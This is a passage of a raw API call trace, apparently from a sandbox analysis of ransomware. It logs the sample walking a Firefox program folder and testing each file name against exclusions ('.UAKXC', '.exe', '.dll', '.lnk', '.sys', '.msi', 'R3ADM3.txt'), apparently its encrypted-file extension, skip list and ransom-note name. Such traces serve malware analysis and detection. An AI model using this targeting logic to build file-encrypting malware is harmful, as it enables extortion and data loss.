HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.730] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf90 | out: hHeap=0xea0000) returned 1 [0139.730] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee7e8 [0139.730] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf90 [0139.730] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0139.730] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee7e8 | out: hHeap=0xea0000) returned 1 [0139.730] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.730] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf04cc60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf04cc60, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x2b590900, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0xfa70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="libEGL.dll", cAlternateFileName="")) returned 1 [0139.730] lstrcmpW (lpString1="libEGL.dll", lpString2=".") returned 1 [0139.730] lstrcmpW (lpString1="libEGL.dll", lpString2="..") returned 1 [0139.730] StrStrIW (lpFirst="libEGL.dll", lpSrch=".UAKXC") returned 0x0 [0139.730] StrStrIW (lpFirst="libEGL.dll", lpSrch=".exe") returned 0x0 [0139.731] StrStrIW (lpFirst="libEGL.dll", lpSrch=".dll") returned=".dll" [0139.731] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf04cc60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf04cc60, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x2c8a3600, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x86270, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="libGLESv2.dll", cAlternateFileName="LIBGLE~1.DLL")) returned 1 [0139.731] lstrcmpW (lpString1="libGLESv2.dll", lpString2=".") returned 1 [0139.731] lstrcmpW (lpString1="libGLESv2.dll", lpString2="..") returned 1 [0139.731] StrStrIW (lpFirst="libGLESv2.dll", lpSrch=".UAKXC") returned 0x0 [0139.731] StrStrIW (lpFirst="libGLESv2.dll", lpSrch=".exe") returned 0x0 [0139.731] StrStrIW (lpFirst="libGLESv2.dll", lpSrch=".dll") returned=".dll" [0139.731] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf04cc60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf04cc60, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x2d22cc80, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1d270, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="maintenanceservice.exe", cAlternateFileName="MAINTE~1.EXE")) returned 1 [0139.731] lstrcmpW (lpString1="maintenanceservice.exe", lpString2=".") returned 1 [0139.731] lstrcmpW (lpString1="maintenanceservice.exe", lpString2="..") returned 1 [0139.731] StrStrIW (lpFirst="maintenanceservice.exe", lpSrch=".UAKXC") returned 0x0 [0139.731] StrStrIW (lpFirst="maintenanceservice.exe", lpSrch=".exe") returned=".exe" [0139.732] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf072dc0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf072dc0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x2d22cc80, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x2f7f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="maintenanceservice_installer.exe", cAlternateFileName="MAINTE~2.EXE")) returned 1 [0139.732] lstrcmpW (lpString1="maintenanceservice_installer.exe", lpString2=".") returned 1 [0139.732] lstrcmpW (lpString1="maintenanceservice_installer.exe", lpString2="..") returned 1 [0139.732] StrStrIW (lpFirst="maintenanceservice_installer.exe", lpSrch=".UAKXC") returned 0x0 [0139.732] StrStrIW (lpFirst="maintenanceservice_installer.exe", lpSrch=".exe") returned=".exe" [0139.732] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf072dc0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf072dc0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x2e53f980, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x4270, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mozalloc.dll", cAlternateFileName="")) returned 1 [0139.732] lstrcmpW (lpString1="mozalloc.dll", lpString2=".") returned 1 [0139.732] lstrcmpW (lpString1="mozalloc.dll", lpString2="..") returned 1 [0139.732] StrStrIW (lpFirst="mozalloc.dll", lpSrch=".UAKXC") returned 0x0 [0139.732] StrStrIW (lpFirst="mozalloc.dll", lpSrch=".exe") returned 0x0 [0139.732] StrStrIW (lpFirst="mozalloc.dll", lpSrch=".dll") returned=".dll" [0139.732] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf072dc0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf072dc0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x2eec9000, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1fe70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mozglue.dll", cAlternateFileName="")) returned 1 [0139.732] lstrcmpW (lpString1="mozglue.dll", lpString2=".") returned 1 [0139.732] lstrcmpW (lpString1="mozglue.dll", lpString2="..") returned 1 [0139.732] StrStrIW (lpFirst="mozglue.dll", lpSrch=".UAKXC") returned 0x0 [0139.732] StrStrIW (lpFirst="mozglue.dll", lpSrch=".exe") returned 0x0 [0139.732] StrStrIW (lpFirst="mozglue.dll", lpSrch=".dll") returned=".dll" [0139.732] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf098f20, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf098f20, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x314eea00, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x336470, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mozjs.dll", cAlternateFileName="")) returned 1 [0139.732] lstrcmpW (lpString1="mozjs.dll", lpString2=".") returned 1 [0139.732] lstrcmpW (lpString1="mozjs.dll", lpString2="..") returned 1 [0139.732] StrStrIW (lpFirst="mozjs.dll", lpSrch=".UAKXC") returned 0x0 [0139.732] StrStrIW (lpFirst="mozjs.dll", lpSrch=".exe") returned 0x0 [0139.732] StrStrIW (lpFirst="mozjs.dll", lpSrch=".dll") returned=".dll" [0139.732] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf098f20, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf098f20, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x3809e300, ftLastWriteTime.dwHighDateTime=0x1cac6b6, nFileSizeHigh=0x0, nFileSizeLow=0x66d50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msvcp100.dll", cAlternateFileName="")) returned 1 [0139.732] lstrcmpW (lpString1="msvcp100.dll", lpString2=".") returned 1 [0139.732] lstrcmpW (lpString1="msvcp100.dll", lpString2="..") returned 1 [0139.732] StrStrIW (lpFirst="msvcp100.dll", lpSrch=".UAKXC") returned 0x0 [0139.733] StrStrIW (lpFirst="msvcp100.dll", lpSrch=".exe") returned 0x0 [0139.733] StrStrIW (lpFirst="msvcp100.dll", lpSrch=".dll") returned=".dll" [0139.733] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0bf080, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf0bf080, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x3809e300, ftLastWriteTime.dwHighDateTime=0x1cac6b6, nFileSizeHigh=0x0, nFileSizeLow=0xbc150, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msvcr100.dll", cAlternateFileName="")) returned 1 [0139.733] lstrcmpW (lpString1="msvcr100.dll", lpString2=".") returned 1 [0139.733] lstrcmpW (lpString1="msvcr100.dll", lpString2="..") returned 1 [0139.733] StrStrIW (lpFirst="msvcr100.dll", lpSrch=".UAKXC") returned 0x0 [0139.733] StrStrIW (lpFirst="msvcr100.dll", lpSrch=".exe") returned 0x0 [0139.733] StrStrIW (lpFirst="msvcr100.dll", lpSrch=".dll") returned=".dll" [0139.733] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1ee4ba0, ftCreationTime.dwHighDateTime=0x1d5e68f, ftLastAccessTime.dwLowDateTime=0xf493a9c0, ftLastAccessTime.dwHighDateTime=0x1d57c55, ftLastWriteTime.dwLowDateTime=0xf493a9c0, ftLastWriteTime.dwHighDateTime=0x1d57c55, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ncftp.exe", cAlternateFileName="")) returned 1 [0139.733] lstrcmpW (lpString1="ncftp.exe", lpString2=".") returned 1 [0139.733] lstrcmpW (lpString1="ncftp.exe", lpString2="..") returned 1 [0139.733] StrStrIW (lpFirst="ncftp.exe", lpSrch=".UAKXC") returned 0x0 [0139.733] StrStrIW (lpFirst="ncftp.exe", lpSrch=".exe") returned=".exe" [0139.733] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0bf080, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf0bf080, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x3318ad80, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1b1870, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nss3.dll", cAlternateFileName="")) returned 1 [0139.733] lstrcmpW (lpString1="nss3.dll", lpString2=".") returned 1 [0139.733] lstrcmpW (lpString1="nss3.dll", lpString2="..") returned 1 [0139.733] StrStrIW (lpFirst="nss3.dll", lpSrch=".UAKXC") returned 0x0 [0139.733] StrStrIW (lpFirst="nss3.dll", lpSrch=".exe") returned 0x0 [0139.734] StrStrIW (lpFirst="nss3.dll", lpSrch=".dll") returned=".dll" [0139.734] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0bf080, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf0bf080, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x3449da80, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x60070, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nssckbi.dll", cAlternateFileName="")) returned 1 [0139.734] lstrcmpW (lpString1="nssckbi.dll", lpString2=".") returned 1 [0139.734] lstrcmpW (lpString1="nssckbi.dll", lpString2="..") returned 1 [0139.734] StrStrIW (lpFirst="nssckbi.dll", lpSrch=".UAKXC") returned 0x0 [0139.734] StrStrIW (lpFirst="nssckbi.dll", lpSrch=".exe") returned 0x0 [0139.734] StrStrIW (lpFirst="nssckbi.dll", lpSrch=".dll") returned=".dll" [0139.734] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0e51e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf0e51e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x34e27100, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x383, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nssdbm3.chk", cAlternateFileName="")) returned 1 [0139.734] lstrcmpW (lpString1="nssdbm3.chk", lpString2=".") returned 1 [0139.734] lstrcmpW (lpString1="nssdbm3.chk", lpString2="..") returned 1 [0139.734] StrStrIW (lpFirst="nssdbm3.chk", lpSrch=".UAKXC") returned 0x0 [0139.734] StrStrIW (lpFirst="nssdbm3.chk", lpSrch=".exe") returned 0x0 [0139.734] StrStrIW (lpFirst="nssdbm3.chk", lpSrch=".dll") returned 0x0 [0139.734] StrStrIW (lpFirst="nssdbm3.chk", lpSrch=".lnk") returned 0x0 [0139.734] StrStrIW (lpFirst="nssdbm3.chk", lpSrch=".sys") returned 0x0 [0139.734] StrStrIW (lpFirst="nssdbm3.chk", lpSrch=".msi") returned 0x0 [0139.734] StrStrIW (lpFirst="nssdbm3.chk", lpSrch="R3ADM3.txt") returned 0x0 [0139.735] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecfb8 [0139.735] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.735] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.735] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.735] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.735] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.735] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecfb8 | out: hHeap=0xea0000) returned 1 [0139.735] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee7e8 [0139.735] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecfb8 [0139.735] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee950 [0139.735] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee7e8 | out: hHeap=0xea0000) returned 1 [0139.735] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.735] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0e51e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf0e51e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x34e27100, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x16870, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nssdbm3.dll", cAlternateFileName="")) returned 1 [0139.735] lstrcmpW (lpString1="nssdbm3.dll", lpString2=".") returned 1 [0139.735] lstrcmpW (lpString1="nssdbm3.dll", lpString2="..") returned 1 [0139.735] StrStrIW (lpFirst="nssdbm3.dll", lpSrch=".UAKXC") returned 0x0 [0139.735] StrStrIW (lpFirst="nssdbm3.dll", lpSrch=".exe") returned 0x0 [0139.736] StrStrIW (lpFirst="nssdbm3.dll", lpSrch=".dll") returned=".dll" [0139.736] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0e51e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf0e51e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x58a5b700, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x771d55, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="omni.ja", cAlternateFileName="")) returned 1 [0139.736] lstrcmpW (lpString1="omni.ja", lpString2=".") returned 1 [0139.736] lstrcmpW (lpString1="omni.ja", lpString2="..") returned 1 [0139.736] StrStrIW (lpFirst="omni.ja", lpSrch=".UAKXC") returned 0x0 [0139.736] StrStrIW (lpFirst="omni.ja", lpSrch=".exe") returned 0x0 [0139.736] StrStrIW (lpFirst="omni.ja", lpSrch=".dll") returned 0x0 [0139.736] StrStrIW (lpFirst="omni.ja", lpSrch=".lnk") returned 0x0 [0139.736] StrStrIW (lpFirst="omni.ja", lpSrch=".sys") returned 0x0 [0139.736] StrStrIW (lpFirst="omni.ja", lpSrch=".msi") returned 0x0 [0139.737] StrStrIW (lpFirst="omni.ja", lpSrch="R3ADM3.txt") returned 0x0 [0139.737] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.737] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.737] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.737] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.737] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.737] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec358 [0139.737] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecfe0 [0139.737] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec3c0 [0139.737] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec358 | out: hHeap=0xea0000) returned 1 [0139.737] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.737] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf10b340, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf10b340, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb1218800, ftLastWriteTime.dwHighDateTime=0x1ced1df, nFileSizeHigh=0x0, nFileSizeLow=0x8c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="platform.ini", cAlternateFileName="")) returned 1 [0139.737] lstrcmpW (lpString1="platform.ini", lpString2=".") returned 1 [0139.737] lstrcmpW (lpString1="platform.ini", lpString2="..") returned 1 [0139.737] StrStrIW (lpFirst="platform.ini", lpSrch=".UAKXC") returned 0x0 [0139.737] StrStrIW (lpFirst="platform.ini", lpSrch=".exe") returned 0x0 [0139.738] StrStrIW (lpFirst="platform.ini", lpSrch=".dll") returned 0x0 [0139.738] StrStrIW (lpFirst="platform.ini", lpSrch=".lnk") returned 0x0 [0139.738] StrStrIW (lpFirst="platform.ini", lpSrch=".sys") returned 0x0 [0139.738] StrStrIW (lpFirst="platform.ini", lpSrch=".msi") returned 0x0 [0139.738] StrStrIW (lpFirst="platform.ini", lpSrch="R3ADM3.txt") returned 0x0 [0139.738] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed008 [0139.738] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.738] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.738] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.738] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.738] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.738] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed008 | out: hHeap=0xea0000) returned 1 [0139.738] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee7e8 [0139.738] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed008 [0139.738] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee9c8 [0139.738] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee7e8 | out: hHeap=0xea0000) returned 1 [0139.738] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.738] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1314a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf1314a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x357b0780, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x4870, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="plugin-container.exe", cAlternateFileName="PLUGIN~1.EXE")) returned 1 [0139.738] lstrcmpW (lpString1="plugin-container.exe", lpString2=".") returned 1 [0139.738] lstrcmpW (lpString1="plugin-container.exe", lpString2="..") returned 1 [0139.738] StrStrIW (lpFirst="plugin-container.exe", lpSrch=".UAKXC") returned 0x0 [0139.739] StrStrIW (lpFirst="plugin-container.exe", lpSrch=".exe") returned=".exe" [0139.739] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1314a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf1314a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x36139e00, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x6e70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="plugin-hang-ui.exe", cAlternateFileName="PLUGIN~2.EXE")) returned 1 [0139.739] lstrcmpW (lpString1="plugin-hang-ui.exe", lpString2=".") returned 1 [0139.739] lstrcmpW (lpString1="plugin-hang-ui.exe", lpString2="..") returned 1 [0139.739] StrStrIW (lpFirst="plugin-hang-ui.exe", lpSrch=".UAKXC") returned 0x0 [0139.739] StrStrIW (lpFirst="plugin-hang-ui.exe", lpSrch=".exe") returned=".exe" [0139.739] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1314a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf1314a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5c2963ee, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x7e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="precomplete", cAlternateFileName="PRECOM~1")) returned 1 [0139.739] lstrcmpW (lpString1="precomplete", lpString2=".") returned 1 [0139.739] lstrcmpW (lpString1="precomplete", lpString2="..") returned 1 [0139.739] StrStrIW (lpFirst="precomplete", lpSrch=".UAKXC") returned 0x0 [0139.739] StrStrIW (lpFirst="precomplete", lpSrch=".exe") returned 0x0 [0139.739] StrStrIW (lpFirst="precomplete", lpSrch=".dll") returned 0x0 [0139.739] StrStrIW (lpFirst="precomplete", lpSrch=".lnk") returned 0x0 [0139.739] StrStrIW (lpFirst="precomplete", lpSrch=".sys") returned 0x0 [0139.739] StrStrIW (lpFirst="precomplete", lpSrch=".msi") returned 0x0 [0139.739] StrStrIW (lpFirst="precomplete", lpSrch="R3ADM3.txt") returned 0x0 [0139.739] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed030 [0139.739] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.739] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.739] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.739] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.739] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.739] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed030 | out: hHeap=0xea0000) returned 1 [0139.739] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee7e8 [0139.740] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed030 [0139.740] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeea40 [0139.740] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee7e8 | out: hHeap=0xea0000) returned 1 [0139.740] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.740] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58787d30, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x58787d30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58787d30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0139.740] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0139.740] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0139.740] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0139.740] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0139.740] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0139.740] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0139.740] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0139.740] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0139.740] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0139.740] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1314a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf1314a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, 